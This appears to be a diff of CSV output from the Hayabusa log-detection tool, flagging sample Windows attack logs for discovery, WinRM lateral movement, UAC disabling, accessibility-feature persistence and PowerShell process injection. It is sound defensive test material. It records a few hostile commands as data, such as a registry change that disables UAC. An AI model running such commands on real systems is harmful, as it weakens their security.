+2019-05-15 02:17:26.738 +09:00,alice.insecurebank.local,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
+2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49586 (alice.insecurebank.local) | Dst: 10.59.4.24:445 (edward) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
+2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49587 (alice.insecurebank.local) | Dst: 10.59.4.21:445 (bob) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
+2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49588 (alice.insecurebank.local) | Dst: 10.59.4.22:445 (CHARLES) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
+2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49589 (alice.insecurebank.local) | Dst: 10.59.4.25:445 (FRED) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
+2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49590 (alice.insecurebank.local) | Dst: 10.59.4.11:445 (DC1) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
+2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49592 (alice.insecurebank.local) | Dst: 10.59.4.23:445 (dave) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
+2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49593 (alice.insecurebank.local) | Dst: 10.59.4.12:445 (DEV_SERVER) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
+2019-05-15 02:31:27.973 +09:00,DC1.insecurebank.local,18,info,,Pipe Connected,\srvsvc | Process: System | PID: 4 | PGUID: DFAE8213-F1B5-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_18_Invoke_UserHunter_NetSessionEnum_DC-srvsvc.evtx
+2019-05-15 02:42:52.833 +09:00,DC1.insecurebank.local,18,info,,Pipe Connected,\srvsvc | Process: System | PID: 4 | PGUID: DFAE8213-F1B5-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_enum_shares_target_sysmon_3_18.evtx
+2019-05-15 02:42:52.848 +09:00,DC1.insecurebank.local,18,info,,Pipe Connected,\srvsvc | Process: System | PID: 4 | PGUID: DFAE8213-F1B5-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_enum_shares_target_sysmon_3_18.evtx
+2019-05-15 02:42:53.854 +09:00,DC1.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.11:445 (DC1.insecurebank.local) | Dst: 10.59.4.20:49304 (ALICE) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: DFAE8213-F1B5-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_enum_shares_target_sysmon_3_18.evtx
+2019-05-15 02:43:03.888 +09:00,DC1.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.11:445 (DC1.insecurebank.local) | Dst: 10.59.4.20:49306 (ALICE) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: DFAE8213-F1B5-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_enum_shares_target_sysmon_3_18.evtx
+2019-05-15 13:18:40.474 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Defense Evasion - access to the VBA project object model in the Macro Settings changed | SetValue: HKU\S-1-5-21-3583694148-1414552638-2922671848-1000\Software\Microsoft\Office\16.0\Excel\Security\AccessVBOM: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 3804 | PGUID: 365ABB72-92DF-5CDB-0000-0010A15E1300,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_sysmon_13_VBA_Security_AccessVBOM.evtx
+2019-05-15 13:18:40.474 +09:00,IEWIN7,13,high,Evas,Office Security Settings Changed,,rules/sigma/registry_event/sysmon_reg_office_security.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_sysmon_13_VBA_Security_AccessVBOM.evtx
+2019-05-16 10:31:36.426 +09:00,DC1.insecurebank.local,1,info,,Process Created,Cmd: C:\Windows\system32\WinrsHost.exe -Embedding | Process: C:\Windows\System32\winrshost.exe | User: insecurebank\Administrator | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x12fe05 | PID: 3948 | PGUID: DFAE8213-BD78-5CDC-0000-0010C7FE1200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx
+2019-05-16 10:31:36.454 +09:00,DC1.insecurebank.local,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.exe /C ipconfig | Process: C:\Windows\System32\cmd.exe | User: insecurebank\Administrator | Parent Cmd: C:\Windows\system32\WinrsHost.exe -Embedding | LID: 0x12fe05 | PID: 3136 | PGUID: DFAE8213-BD78-5CDC-0000-001091041300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx
+2019-05-16 10:31:36.456 +09:00,DC1.insecurebank.local,1,info,,Process Created,Cmd: ipconfig | Process: C:\Windows\System32\ipconfig.exe | User: insecurebank\Administrator | Parent Cmd: C:\Windows\system32\cmd.exe /C ipconfig | LID: 0x12fe05 | PID: 1744 | PGUID: DFAE8213-BD78-5CDC-0000-001074051300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx
+2019-05-16 10:38:19.630 +09:00,DC1.insecurebank.local,1,high,,Process Created_Sysmon Alert,"Lateral Movement - Windows Remote Management | Cmd: ""C:\Windows\system32\HOSTNAME.EXE"" | Process: C:\Windows\System32\HOSTNAME.EXE | User: insecurebank\Administrator | Parent Cmd: C:\Windows\system32\wsmprovhost.exe -Embedding | LID: 0x15daaf | PID: 2936 | PGUID: DFAE8213-BF0B-5CDC-0000-00105A951600 | Hash: SHA1=4ED8B225C9CC97DD02C9A5DFD9F733C353F83E36,MD5=74D1E6E8AC6ABCC1DE934C8C5E422B64,SHA256=CA40BB9470E8E73767F3AA43DDF51F814481167DEC6C2FAA1996C18AB2C621DB,IMPHASH=65F157041816229C2919A683CBA86F70",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx
+2019-05-16 10:38:19.630 +09:00,DC1.insecurebank.local,1,low,Disc,Suspicious Execution of Hostname,,rules/sigma/process_creation/proc_creation_win_susp_hostname.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx
+2019-05-16 10:38:19.630 +09:00,DC1.insecurebank.local,1,medium,Exec,Remote PowerShell Session Host Process (WinRM),,rules/sigma/process_creation/proc_creation_win_remote_powershell_session_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx
+2019-05-16 22:10:13.760 +09:00,DC1.insecurebank.local,12,medium,,Registry Key Create/Delete_Sysmon Alert,Defense Evasion - PowerShell CLM Setting Changed | DeleteValue: HKLM\System\CurrentControlSet\Control\SESSION MANAGER\Environment\__PSLockdownPolicy | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3580 | PGUID: DFAE8213-5B49-5CDD-0000-0010EE520500,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Powershell_CLM_Disabled_Sysmon_12.evtx
+2019-05-16 23:17:15.762 +09:00,DC1.insecurebank.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1112,technique_name=Modify Registry | Cmd: reg add hklm\software\microsoft\windows\currentversion\policies\system /v EnableLUA /t REG_DWORD /d 0x0 /f | Process: C:\Windows\System32\reg.exe | User: insecurebank\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x585e6 | PID: 3788 | PGUID: DFAE8213-70EB-5CDD-0000-0010F66D0A00 | Hash: SHA1=0873F40DE395DE017495ED5C7E693AFB55E9F867,MD5=A3F446F1E2B8C6ECE56F608FB32B8DC6,SHA256=849F54DC526EA18D59ABAF4904CB11BC15B982D2952B971F2E1B6FBF8C974B39,IMPHASH=A069A88BBB8016324D7EC0A0EEC459EB",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx
+2019-05-16 23:17:15.763 +09:00,DC1.insecurebank.local,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1088,technique_name=Bypass User Account Control | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\EnableLUA: DWORD (0x00000000) | Process: C:\Windows\system32\reg.exe | PID: 3788 | PGUID: DFAE8213-70EB-5CDD-0000-0010F66D0A00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx
+2019-05-16 23:17:15.763 +09:00,DC1.insecurebank.local,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1088,technique_name=Bypass User Account Control | CreateKey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system | Process: C:\Windows\system32\reg.exe | PID: 3788 | PGUID: DFAE8213-70EB-5CDD-0000-0010F66D0A00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx
+2019-05-16 23:17:15.763 +09:00,DC1.insecurebank.local,13,medium,PrivEsc | Evas,Disable UAC Using Registry,,rules/sigma/registry_event/win_re_disable_uac_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx
+2019-05-17 01:08:30.516 +09:00,DC1.insecurebank.local,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1076,technique_name=Remote Desktop Protocol | CreateKey: HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services | Process: C:\Windows\system32\LogonUI.exe | PID: 1684 | PGUID: DFAE8213-8AFE-5CDD-0000-001035B90A00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
+2019-05-17 01:08:34.867 +09:00,DC1.insecurebank.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1015,technique_name=Accessibility Features | Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: utilman.exe /debug | LID: 0x3e7 | PID: 1720 | PGUID: DFAE8213-8B02-5CDD-0000-00109BCA0A00 | Hash: SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
+2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1033,technique_name=System Owner/User Discovery | Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\osk.exe"" | LID: 0x3e7 | PID: 3764 | PGUID: DFAE8213-8B08-5CDD-0000-001011CE0A00 | Hash: SHA1=E06B89D9B87A8A4E5A8B7A5307C3BA88E0A01D41,MD5=D609D59A042C04A50EB41EC5D52F7471,SHA256=16C4CEE8C7BF4070E25A32F0B95857FA5CEC51E47D246E6FBAD69887460961B2,IMPHASH=98A3BC461E82881A801A12AAA668BD47",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
+2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
+2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,Disc,Whoami Execution Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
+2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
+2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx
+2019-05-19 02:16:08.348 +09:00,IEWIN7,10,low,,Process Access,Src Process: 耙甯\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:08.348 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.176 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.176 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.176 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.208 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.208 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.208 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.223 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.223 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.223 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.255 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.255 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.255 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.270 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.270 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.270 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.286 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.286 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.286 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.317 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.317 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.317 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.333 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.333 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.333 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.348 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.348 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.348 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:16.364 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
